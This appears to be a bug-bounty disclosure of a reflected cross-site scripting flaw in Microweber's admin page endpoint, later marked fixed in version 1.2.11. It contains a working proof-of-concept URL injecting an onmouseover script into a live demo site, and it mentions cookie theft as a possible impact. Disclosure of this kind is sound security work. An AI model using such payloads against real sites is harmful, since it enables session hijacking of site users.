Cross-site Scripting (XSS) - Reflected in microweber/microweber
Feb 19th 2022
Hi, The endpoint https://demo.microweber.org/demo/admin/page is vulnerable to Cross Site Scripting.
Proof of Concept
just navigate to the poc url: https://demo.microweber.org/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit
now move your mouse on the page, you will see a xss popup.
(login if site asks)
Cross site scripting attacks can lead to account takeover via cookie stealing, temporary site deface, redirecting users to attackers controlled sites etc.
Peter Ivanov validated this vulnerability a year ago
Damanpreet has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit f7f5d4 a year ago
This vulnerability will not receive a CVE
to join this conversation